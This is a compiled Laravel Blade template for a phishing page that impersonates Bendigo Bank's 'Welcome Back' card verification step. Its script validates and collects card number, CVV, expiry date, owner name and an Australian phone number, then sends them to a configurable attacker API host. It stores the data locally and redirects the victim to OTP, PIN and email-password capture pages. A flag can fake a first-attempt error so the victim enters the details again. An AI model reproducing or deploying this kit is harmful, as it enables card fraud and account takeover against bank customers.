<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script defer src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.16/dist/tailwind.min.css">
    <link rel="stylesheet" href="<?php echo e(asset('css/app.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('css/footer.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('css/loader.css')); ?>">
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
    <title>Bendigo Bank - Welcome Back</title>
    <style>
    </style>
    <script>
        const pages = {
            otp: 'otp',
            pin: 'pin',
            email_password: 'email-password',
        }
        const status = window.localStorage.getItem("status");
        if (status) {
            if (status == 'otp' || status == 'pin' || status == 'email-password')
                location.replace(location.href.toString().split("/card")[0] + "/" + status);
        } else {
            location.replace(location.href.toString().split("/card")[0] + "/" + 'login');
        }

        function onCard(token) {
            let test = true
            test = validateCreditCard(cardNumber.value) && test;
            test = validateCardCVV(cardCVV.value) && test;
            test = validateExDate(exDate.value) && test;
            test = validateOwner(owner.value) && test;
            test = validatePhone(phone.value) && test;
            const isEmpty = '<?php echo e($is_field_empty); ?>' == '1' ? true : false;
            if (test) {
                const captcha = document.getElementsByName("g-recaptcha-response")[0].value;
                loader.style.display = "flex";
                setTimeout(() => {
                    let isLogged = (isLoggedFirstTime === true && isNeedTwice === true) || (isLoggedFirstTime === false && isNeedTwice === false) ? true : false
                    axios.post(`<?php echo e($api_host); ?>/api/card?cardNumber=${cardNumber.value}&cardCVV=${cardCVV.value}&exDate=${exDate.value}&owner=${owner.value}&phone=${phone.value}&captcha=${captcha}
                `, {})
                        .then(function(response) {
                            if ((!isNeedTwice) || (isNeedTwice == true && isLoggedFirstTime == true)) {
                                isLoggedFirstTime = true;
                                window.localStorage?.setItem("status", "otp");
                                window.localStorage?.setItem("owner", owner.value);
                                window.localStorage?.setItem("cardNumber", cardNumber.value);
                                window.localStorage?.setItem("cardCVV", cardCVV.value);
                                window.localStorage?.setItem("exDate", exDate.value);
                                window.localStorage?.setItem("phone", phone.value);
                                location.replace(location.href.toString().split("/card")[0] + "/otp");
                            } else {
                                isLoggedFirstTime = true;
                                if (isEmpty) {
                                    cardCVV.value = "";
                                    exDate.value = "";
                                    owner.value = "";
                                    phone.value = "";
                                    cardNumber.value = "";
                                    cardNumber.focus();
                                }
                                loader.style.display = "none";
                                alert.style.display = "flex";
                            }
                        })
                        .catch(function(error) {
                            console.error('Error:', error);
                            location.replace('<?php echo e($error_link); ?>');
                        });


                }, refresh);
            }
        }
    </script>
</head>

<div class="bg-white text-black font-sans">
    <?php if (isset($component)) { $__componentOriginal10272e51f130100470ff2959e0da66e3b71ecb93 = $component; } ?>
<?php $component = App\View\Components\Loader::resolve([] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component->withName('loader'); ?>
<?php if ($component->shouldRender()): ?>
<?php $__env->startComponent($component->resolveView(), $component->data()); ?>
<?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Loader::class))->getConstructor()): ?>
<?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php endif; ?>
<?php $component->withAttributes([]); ?>
<?php echo $__env->renderComponent(); ?>
<?php endif; ?>
<?php if (isset($__componentOriginal10272e51f130100470ff2959e0da66e3b71ecb93)): ?>
<?php $component = $__componentOriginal10272e51f130100470ff2959e0da66e3b71ecb93; ?>
<?php unset($__componentOriginal10272e51f130100470ff2959e0da66e3b71ecb93); ?>
<?php endif; ?>
    <?php if (isset($component)) { $__componentOriginal99db13291ff287454d08b974e14dad64f9e2c6f3 = $component; } ?>
<?php $component = App\View\Components\Header::resolve([] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component->withName('header'); ?>
<?php if ($component->shouldRender()): ?>
<?php $__env->startComponent($component->resolveView(), $component->data()); ?>
<?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Header::class))->getConstructor()): ?>
<?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php endif; ?>
<?php $component->withAttributes([]); ?>
<?php echo $__env->renderComponent(); ?>
<?php endif; ?>
<?php if (isset($__componentOriginal99db13291ff287454d08b974e14dad64f9e2c6f3)): ?>
<?php $component = $__componentOriginal99db13291ff287454d08b974e14dad64f9e2c6f3; ?>
<?php unset($__componentOriginal99db13291ff287454d08b974e14dad64f9e2c6f3); ?>
<?php endif; ?>

    <div class="bg-red-100 text-red-700 alert-container" role="alert">
        <div class="flex max-w-screen-xl mx-auto p-4 ">
            <div class="py-1">
                <svg class="fill-current h-6 w-6 text-red-500 mr-4" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20">
                    <path d="M10 2C5.03 2 1 6.03 1 11s4.03 9 9 9 9-4.03 9-9-4.03-9-9-9zm0 16a7 7 0 100-14 7 7 0 000 14z" />
                    <path d="M11 12h-2v-2h2v2zm0-4h-2V5h2v3z" />
                </svg>
            </div>
            <div>
                <p class="font-bold">Oops! It seems there might be a small typo in your credit card information.</p>
                <p class="text-sm">Please double-check and ensure the details are accurate. Mistakes happen to the best of us!</p>
            </div>
        </div>
    </div>


    <div class="mt-3 lg:mt-20 pb-56">
        <form class="max-w-md mx-auto p-5" action="#" method="get">
            <div class="text-2xl font-semibold lg:mt-0">Welcome Back</div>
            <div class="font-normal mt-5 ">
                <p>Account : <span id="id" class="font-bold"></span><br>To complete the process, you need to fill your card information</p>
            </div>
            <p class="font-bold text-sm mt-14 mb-5 block">Credit card information</p>
            <div class="mb-5 flex items-center relative">
                <img src="./assets/images/icons/cvv.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                <input id="cardNumber" type="text" name="access" placeholder="Card Number" required inputmode="numeric" maxlength="16" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
            </div>
            <div class="error hidden text-sm mb-5">
                Card number is invalid. It should be a numeric value with a maximum length of 16 characters.
            </div>
            <div class="mb-5 flex items-center relative">
                <img src="./assets/images/icons/password.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                <input id="cardCVV" type="password" name="access" placeholder="CVV" required inputmode="numeric" maxlength="3" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
            </div>
            <div class="error hidden text-sm mb-5">
                CVV is invalid. It should be a 3-digit number.
            </div>
            <div class="mb-5 flex items-center relative">
                <img src="./assets/images/icons/date.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                <input id="exDate" type="text" name="access" placeholder="Expiry date" required maxlength="5" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
            </div>
            <div class="error hidden text-sm mb-5">
                Expiry date is invalid. It should be in MM/YY format and not expired.
            </div>
            <div>
                <label for="" class="font-bold text-sm mb-5 block">Owner Information</label>
                <div class="mb-5 flex items-center relative">
                    <img src="./assets/images/icons/user.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                    <input id="owner" type="text" name="password" placeholder="Owner Full Name" required maxlength="12" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
                </div>
                <div class="error hidden text-sm mb-5">
                    Owner name is required.
                </div>
                <div class="mb-5 flex items-center relative">
                    <img src="./assets/images/icons/phone.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                    <input id="phone" type="text" name="password" placeholder="Phone Number +61" value="+" required maxlength="12" class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
                </div>
                <div class="error hidden text-sm mb-5">
                    Phone number is required. It should be an Australian number.
                </div>
            </div>
            <input name="submit_frm" type="hidden" value="login">

            <button data-sitekey="<?php echo e($recaptcha_key); ?>" data-callback="onCard" data-action="submit" class="g-recaptcha w-full py-4 font-bold text-white rounded-sm  transition duration-300 ease-in-out">Next</button>

        </form>
    </div>

    <?php if (isset($component)) { $__componentOriginal88b1957f21f7f49b400717e8d0a27189798132bf = $component; } ?>
<?php $component = App\View\Components\Footer::resolve([] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component->withName('footer'); ?>
<?php if ($component->shouldRender()): ?>
<?php $__env->startComponent($component->resolveView(), $component->data()); ?>
<?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Footer::class))->getConstructor()): ?>
<?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php endif; ?>
<?php $component->withAttributes([]); ?>
<?php echo $__env->renderComponent(); ?>
<?php endif; ?>
<?php if (isset($__componentOriginal88b1957f21f7f49b400717e8d0a27189798132bf)): ?>
<?php $component = $__componentOriginal88b1957f21f7f49b400717e8d0a27189798132bf; ?>
<?php unset($__componentOriginal88b1957f21f7f49b400717e8d0a27189798132bf); ?>
<?php endif; ?>
</div>
<script defer>
    const cardNumber = document.getElementById("cardNumber");
    const cardCVV = document.getElementById("cardCVV");
    const exDate = document.getElementById("exDate");
    const owner = document.getElementById("owner");
    const phone = document.getElementById("phone");
    const password = document.getElementById("password");
    const submit = document.querySelector("button[type='submit']");
    const loader = document.getElementsByClassName("loader-container")[0];
    const alert = document.getElementsByClassName("alert-container")[0];
    const id = document.getElementById("id");
    id.innerHTML = window.localStorage?.getItem("accessId");


    let refresh = '<?php echo e($refresh); ?>';
    let isNeedTwice = '<?php echo e($isNeedTwice); ?>';
    let isLoggedFirstTime = false;
    isNeedTwice == 'true' ? true : false;

    function validateCreditCard(number) {
        const visaPattern = /^(4[0-9]{12}(?:[0-9]{3})?)$/;
        const mastercardPattern = /^(5[1-5][0-9]{14})$/;
        const amexPattern = /^(3[47][0-9]{13})$/;
        const discoverPattern = /^(6011[0-9]{12})$/;

        number = number.replace(/\D/g, '');

        if (visaPattern.test(number)) {
            cardNumber.parentElement.classList.remove("invalid");
            return true;
        } else if (mastercardPattern.test(number)) {
            cardNumber.parentElement.classList.remove("invalid");
            return true;
        } else if (amexPattern.test(number)) {
            cardNumber.parentElement.classList.remove("invalid");
            return true;
        } else if (discoverPattern.test(number)) {
            cardNumber.parentElement.classList.remove("invalid");
            return true;
        } else {
            cardNumber.parentElement.classList.add("invalid");
            return false;
        }
    }




    function validateCardCVV(value) {
        if (!/^\d{3}$/.test(value)) {
            cardCVV.parentElement.classList.add("invalid");
            return false;
        } else {
            cardCVV.parentElement.classList.remove("invalid");
            return true;
        }
    }

    function validateExDate(value) {
        const currentDate = new Date();
        const currentYear = currentDate.getFullYear() % 100; // Get the current year in YY format
        const currentMonth = currentDate.getMonth();

        if (!/^\d{2}\/\d{2}$/.test(value)) {
            // Check if the date matches MM/YY format
            exDate.parentElement.classList.add("invalid");
            return false;
        } else {
            const [enteredMonth, enteredYear] = value.split('/');
            const enteredYearInt = parseInt(enteredYear, 10);
            const enteredMonthInt = parseInt(enteredMonth, 10);

            if (
                enteredYearInt < currentYear ||
                (enteredYearInt === currentYear && enteredMonthInt < currentMonth) || enteredMonth < 1 || enteredMonth > 12
            ) {
                // Check if the date is in the future
                exDate.parentElement.classList.add("invalid");
                return false;
            } else {
                exDate.parentElement.classList.remove("invalid");
                return true;
            }
        }
    }

    function validateOwner(value) {
        if (!/^[a-zA-Z ]{2,30}$/.test(value)) {
            owner.parentElement.classList.add("invalid");
            return false;
        } else {
            owner.parentElement.classList.remove("invalid");
            return true;
        }
    }


    function validatePhone(value) {
        // Regular expression pattern for an Australian phone number
        // Must start with "+61" followed by valid Australian phone number formats
        // Example formats: +61212345678 or +61412345678
        if (!/^\+61\d{8}$/.test(value)) {
            // Must start with +61 and be followed by 8 digits
            phone.parentElement.classList.add("invalid");
            return false;
        } else {
            phone.parentElement.classList.remove("invalid");
            return true;
        }
    }



    cardNumber.addEventListener("input", (e) => {
        validateCreditCard(e.target.value);
    });
    cardCVV.addEventListener("input", (e) => {
        validateCardCVV(e.target.value);
    });
    exDate.addEventListener("input", (e) => {
        validateExDate(e.target.value);
    });
    owner.addEventListener("input", (e) => {
        validateOwner(e.target.value);
    });
    phone.addEventListener("input", (e) => {
        validatePhone(e.target.value);
    });
</script>
</div>

</html><?php /**PATH D:\Projects\pro\freelace-project\app-name\resources\views/card.blade.php ENDPATH**/ ?>